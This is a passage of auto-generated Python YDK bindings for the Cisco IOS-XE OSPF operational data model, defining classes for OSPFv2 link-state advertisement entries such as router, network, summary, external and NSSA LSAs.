    self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))])
    # Leaf descriptors: python attribute -> (YLeaf with YANG type/name, accepted python types).
    self._leafs = OrderedDict([
        ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
        ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
        ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
        ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
        ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
        ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
        ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
        ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
    ])

    # Leaf values start unset (None); the bit-flag leaf starts as an empty Bits().
    self.lsa_type = None
    self.lsa_id = None
    self.advertising_router = None
    self.lsa_age = None
    self.lsa_options = Bits()
    self.lsa_seq_number = None
    self.lsa_checksum = None
    self.lsa_length = None

    # Singleton child containers, parented to this node and registered in
    # _children_name_map under their YANG names.
    self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa()
    self.unsupported_lsa.parent = self
    self._children_name_map["unsupported_lsa"] = "unsupported-lsa"

    self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa()
    self.router_lsa.parent = self
    self._children_name_map["router_lsa"] = "router-lsa"

    self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa()
    self.network_lsa.parent = self
    self._children_name_map["network_lsa"] = "network-lsa"

    self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa()
    self.network_summary_lsa.parent = self
    self._children_name_map["network_summary_lsa"] = "network-summary-lsa"

    self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa()
    self.router_summary_lsa.parent = self
    self._children_name_map["router_summary_lsa"] = "router-summary-lsa"

    self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa()
    self.external_lsa.parent = self
    self._children_name_map["external_lsa"] = "external-lsa"

    self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa()
    self.nssa_lsa.parent = self
    self._children_name_map["nssa_lsa"] = "nssa-lsa"

    # Keyed child list of router-LSA link entries.
    self.ospfv2_router_lsa_links = YList(self)

    # Relative XPath segment for this entry, including the three key predicates.
    self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
    # Keep this assignment last: every write above routes through the custom
    # __setattr__, and freezing presumably blocks further attribute creation
    # (NOTE(review): confirm against the ydk Entity base class).
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate every attribute write to the YDK validator, declaring the
    # leaf attributes that belong to this node.
    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
class Ospfv2RouterLsaLinks(Entity):
    """
    The router Link State Advertisement links.

    .. attribute:: link_type  (key)

        Link Type

        **type**\: int

        **range:** 0..255

        **config**\: False

    .. attribute:: link_id  (key)

        link Identifier

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: link_data  (key)

        link data

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: link_topo

        Link topology

        **type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the ospfv2-router-lsa-links list entry: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__()

        self.yang_name = "ospfv2-router-lsa-links"   # YANG node name of this list
        self.yang_parent_name = "ospfv2-lsdb-area"   # enclosing YANG node
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # This list entry is keyed by (link-type, link-id, link-data).
        self.ylist_key_names = ['link_type','link_id','link_data']
        # Child lists reachable from this node: YANG name -> (python attr, class).
        self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))])
        # Leaf descriptors: python attribute -> (YLeaf with YANG type/name, accepted python types).
        self._leafs = OrderedDict([
            ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
        ])

        # Leaf values start unset (None).
        self.link_type = None
        self.link_id = None
        self.link_data = None

        # Child list of per-topology metric entries.
        self.link_topo = YList(self)

        # Relative XPath segment, including the three key predicates.
        self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        # Keep last; freezing presumably blocks further attribute creation
        # (NOTE(review): confirm against the ydk Entity base class).
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)

    class LinkTopo(Entity):
        """
        Link topology.

        .. attribute:: mt_id

            Multi topology identifier

            **type**\: int

            **range:** 0..255

            **config**\: False

        .. attribute:: topo_metric

            Topology metric

            **type**\: int

            **range:** 0..65535

            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the link-topo node: YANG metadata, leaf descriptors and defaults."""
            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()

            self.yang_name = "link-topo"
            self.yang_parent_name = "ospfv2-router-lsa-links"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []               # unkeyed entry
            self._child_classes = OrderedDict([])   # leaf-only node
            # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
            ])
            self.mt_id = None
            self.topo_metric = None

            self._segment_path = lambda: "link-topo"   # relative XPath segment
            self._is_frozen = True                     # keep last; see Entity freeze semantics

        def __setattr__(self, name, value):
            # Route all writes through the YDK validator with this node's leaf names.
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
class UnsupportedLsa(Entity):
    """
    The unsupported Link State Advertisements.

    .. attribute:: lsa_data

        Link State Advertisement data

        **type**\: list of int

        **range:** 0..255

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the unsupported-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__()

        self.yang_name = "unsupported-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []               # unkeyed node
        self._child_classes = OrderedDict([])   # leaf-only node
        # Single leaf-list descriptor: raw LSA bytes as a list of uint8.
        self._leafs = OrderedDict([
            ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
        ])
        self.lsa_data = []   # leaf-list default: empty

        self._segment_path = lambda: "unsupported-lsa"   # relative XPath segment
        self._is_frozen = True                           # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value)
class RouterLsa(Entity):
    """
    The router Link State Advertisements.

    .. attribute:: router_lsa_bits

        Router Link State Advertisement bits

        **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>`

        **config**\: False

    .. attribute:: router_lsa_number_links

        Router Link State Advertisement number of links

        **type**\: int

        **range:** 0..65535

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the router-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__()

        self.yang_name = "router-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []               # unkeyed node
        self._child_classes = OrderedDict([])   # leaf-only node
        # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
            ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
        ])
        self.router_lsa_bits = Bits()          # bit-flag leaf starts empty
        self.router_lsa_number_links = None    # unset

        self._segment_path = lambda: "router-lsa"   # relative XPath segment
        self._is_frozen = True                      # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
class NetworkLsa(Entity):
    """
    The network Link State Advertisements.

    .. attribute:: network_lsa_mask

        Network Link State Advertisement mask

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: network_attached_routers

        Network attached routers

        **type**\: list of int

        **range:** 0..4294967295

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the network-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__()

        self.yang_name = "network-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []               # unkeyed node
        self._child_classes = OrderedDict([])   # leaf-only node
        # Leaf descriptors: a scalar mask plus a leaf-list of attached routers.
        self._leafs = OrderedDict([
            ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
            ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
        ])
        self.network_lsa_mask = None          # unset
        self.network_attached_routers = []    # leaf-list default: empty

        self._segment_path = lambda: "network-lsa"   # relative XPath segment
        self._is_frozen = True                       # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
class NetworkSummaryLsa(Entity):
    """
    The network summary Link State Advertisements.

    .. attribute:: summary_lsa_mask

        The summary Link State Advertisement mask

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: summary_topo

        The summary topology

        **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the network-summary-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__()

        self.yang_name = "network-summary-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []   # unkeyed node
        # Child lists reachable from this node: YANG name -> (python attr, class).
        self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))])
        # Single leaf descriptor for the summary mask.
        self._leafs = OrderedDict([
            ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
        ])
        self.summary_lsa_mask = None      # unset
        self.summary_topo = YList(self)   # child list of per-topology entries

        self._segment_path = lambda: "network-summary-lsa"   # relative XPath segment
        self._is_frozen = True                               # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)

    class SummaryTopo(Entity):
        """
        The summary topology.

        .. attribute:: mt_id

            Multi topology identifier

            **type**\: int

            **range:** 0..255

            **config**\: False

        .. attribute:: topo_metric

            Topology Metric

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the summary-topo node: YANG metadata, leaf descriptors and defaults."""
            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__()

            self.yang_name = "summary-topo"
            self.yang_parent_name = "network-summary-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []               # unkeyed entry
            self._child_classes = OrderedDict([])   # leaf-only node
            # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
            ])
            self.mt_id = None
            self.topo_metric = None

            self._segment_path = lambda: "summary-topo"   # relative XPath segment
            self._is_frozen = True                        # keep last; see Entity freeze semantics

        def __setattr__(self, name, value):
            # Route all writes through the YDK validator with this node's leaf names.
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class RouterSummaryLsa(Entity):
    """
    The router summary Link State Advertisements.

    .. attribute:: summary_lsa_mask

        The summary Link State Advertisement mask

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: summary_topo

        The summary topology

        **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the router-summary-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__()

        self.yang_name = "router-summary-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []   # unkeyed node
        # Child lists reachable from this node: YANG name -> (python attr, class).
        self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))])
        # Single leaf descriptor for the summary mask.
        self._leafs = OrderedDict([
            ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
        ])
        self.summary_lsa_mask = None      # unset
        self.summary_topo = YList(self)   # child list of per-topology entries

        self._segment_path = lambda: "router-summary-lsa"   # relative XPath segment
        self._is_frozen = True                              # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value)

    class SummaryTopo(Entity):
        """
        The summary topology.

        .. attribute:: mt_id

            Multi topology identifier

            **type**\: int

            **range:** 0..255

            **config**\: False

        .. attribute:: topo_metric

            Topology Metric

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the summary-topo node: YANG metadata, leaf descriptors and defaults."""
            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__()

            self.yang_name = "summary-topo"
            self.yang_parent_name = "router-summary-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []               # unkeyed entry
            self._child_classes = OrderedDict([])   # leaf-only node
            # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
            ])
            self.mt_id = None
            self.topo_metric = None

            self._segment_path = lambda: "summary-topo"   # relative XPath segment
            self._is_frozen = True                        # keep last; see Entity freeze semantics

        def __setattr__(self, name, value):
            # Route all writes through the YDK validator with this node's leaf names.
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class ExternalLsa(Entity):
    """
    The external Link State Advertisements.

    .. attribute:: external_lsa_mask

        The mask for the external Link State Advertisement

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: external_topo

        The external topology Link State Advertisement

        **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the external-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__()

        self.yang_name = "external-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []   # unkeyed node
        # Child lists reachable from this node: YANG name -> (python attr, class).
        self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))])
        # Single leaf descriptor for the external LSA mask.
        self._leafs = OrderedDict([
            ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
        ])
        self.external_lsa_mask = None      # unset
        self.external_topo = YList(self)   # child list of per-topology entries

        self._segment_path = lambda: "external-lsa"   # relative XPath segment
        self._is_frozen = True                        # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value)

    class ExternalTopo(Entity):
        """
        The external topology Link State Advertisement.

        .. attribute:: mt_id

            The multi topology identifier

            **type**\: int

            **range:** 0..255

            **config**\: False

        .. attribute:: topo_metric_type

            The topology metric type associated with the Link State Advertisement

            **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`

            **config**\: False

        .. attribute:: topo_metric

            The topology metric

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: topo_forwarding_address

            The topology forwarding address

            **type**\: union of the below types:

                **type**\: str

                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                **type**\: str

                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: topo_route_tag

            The topology route tag

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the external-topo node: YANG metadata, leaf descriptors and defaults."""
            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__()

            self.yang_name = "external-topo"
            self.yang_parent_name = "external-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []               # unkeyed entry
            self._child_classes = OrderedDict([])   # leaf-only node
            # Leaf descriptors; topo-forwarding-address is a string union
            # (IPv4 or IPv6 textual form), hence the two accepted 'str' entries.
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
            ])
            self.mt_id = None
            self.topo_metric_type = None
            self.topo_metric = None
            self.topo_forwarding_address = None
            self.topo_route_tag = None

            self._segment_path = lambda: "external-topo"   # relative XPath segment
            self._is_frozen = True                         # keep last; see Entity freeze semantics

        def __setattr__(self, name, value):
            # Route all writes through the YDK validator with this node's leaf names.
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class NssaLsa(Entity):
    """
    The Not So Stubby Area Link state advertisements.

    .. attribute:: external_lsa_mask

        The mask for the external Link State Advertisement

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: external_topo

        The external topology Link State Advertisement

        **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo>`

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the nssa-lsa node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__()

        self.yang_name = "nssa-lsa"
        self.yang_parent_name = "ospfv2-lsdb-area"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []   # unkeyed node
        # Child lists reachable from this node: YANG name -> (python attr, class).
        self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))])
        # Single leaf descriptor for the external LSA mask.
        self._leafs = OrderedDict([
            ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
        ])
        self.external_lsa_mask = None      # unset
        self.external_topo = YList(self)   # child list of per-topology entries

        self._segment_path = lambda: "nssa-lsa"   # relative XPath segment
        self._is_frozen = True                    # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value)

    class ExternalTopo(Entity):
        """
        The external topology Link State Advertisement.

        .. attribute:: mt_id

            The multi topology identifier

            **type**\: int

            **range:** 0..255

            **config**\: False

        .. attribute:: topo_metric_type

            The topology metric type associated with the Link State Advertisement

            **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`

            **config**\: False

        .. attribute:: topo_metric

            The topology metric

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: topo_forwarding_address

            The topology forwarding address

            **type**\: union of the below types:

                **type**\: str

                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                **type**\: str

                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: topo_route_tag

            The topology route tag

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the external-topo node: YANG metadata, leaf descriptors and defaults."""
            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__()

            self.yang_name = "external-topo"
            self.yang_parent_name = "nssa-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []               # unkeyed entry
            self._child_classes = OrderedDict([])   # leaf-only node
            # Leaf descriptors; topo-forwarding-address is a string union
            # (IPv4 or IPv6 textual form), hence the two accepted 'str' entries.
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
            ])
            self.mt_id = None
            self.topo_metric_type = None
            self.topo_metric = None
            self.topo_forwarding_address = None
            self.topo_route_tag = None

            self._segment_path = lambda: "external-topo"   # relative XPath segment
            self._is_frozen = True                         # keep last; see Entity freeze semantics

        def __setattr__(self, name, value):
            # Route all writes through the YDK validator with this node's leaf names.
